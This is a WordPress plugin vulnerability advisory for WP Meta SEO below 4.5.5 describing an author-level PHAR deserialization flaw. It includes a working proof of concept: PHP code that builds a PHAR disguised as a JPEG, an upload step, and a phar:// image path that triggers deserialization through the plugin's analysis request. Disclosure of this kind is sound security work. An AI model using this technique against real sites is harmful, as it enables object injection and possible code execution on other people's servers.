WordPress Plugin Vulnerabilities
WP Meta SEO < 4.5.5 - Author+ PHAR Deserialization
Description
The plugin does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.
Proof of Concept
1. Use a WordPress instance on PHP 7.x. 2. Create a PHP file `create_phar.php` with the following code: <?php class Evil {} // create new Phar $phar = new Phar('poc.phar'); $phar->startBuffering(); $phar->addFromString('test.png', 'text'); $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>"); $phar->setMetadata(new Evil()); $phar->stopBuffering(); 3. Create the PHAR file `poc.phar` by running `php --define phar.readonly=0 create_phar.php` 4. Rename `poc.phar` to `poc.jpg` 5. Upload `poc.jpg` using the Media Editor. Take note of its path within `wp-content/uploads` 6. Add the following code to the site in order to simulate a gadget: class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } } 7. Create or edit a post or page in the block editor. Add an `HTML` block with the following contents (but replace any parts of the path to `poc.jpg` as needed for your test server). <img src="phar://../wp-content/uploads/2023/03/poc.jpg/test.txt"> 8. Without saving the post or page, open the browser console to view network traffic, then click on “Reload Analysis” in the “SEO Page Optimization” section. Notice the `admin-ajax` request with `action=wpms` and `task=reload_analysis` returns with the text “Arbitrary deserialization”, demonstrating the vulnerability.
Affects Plugins
References
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-27 (about 1 years ago)
Added
2023-03-27 (about 1 years ago)
Last Updated
2023-04-10 (about 1 years ago)